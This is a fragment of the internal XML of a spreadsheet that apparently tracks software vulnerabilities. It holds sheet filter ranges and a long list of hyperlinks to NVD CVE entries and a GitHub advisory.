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CVEs'!$A$1:$S$2447</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'KEV - Exploited'!$A$1:$S$20</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Critical &amp; High'!$A$1:$S$1488</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Watchlist'!$A$1:$S$489</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'Packages (GHSA-OSV)'!$A$1:$S$165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6-81963" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70352" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77995" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77998" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80098" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83711" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55565" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65818" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79748" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-42179" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-11080" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10196" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13447" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16310" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18221" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31020" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35868" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35869" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37003" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37236" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52111" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55559" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62916" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75430" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75816" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77647" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77806" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78362" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82923" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83627" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85504" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85508" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85509" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86184" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86189" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86219" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86304" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53552" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84333" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84352" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84353" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85042" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85047" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85050" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85085" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52777" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75925" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86123" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86148" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86149" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86153" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54391" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58376" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16279" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56705" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62928" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69657" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70403" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77642" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78012" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82526" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84479" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84480" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84695" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85146" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85148" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85154" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85424" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 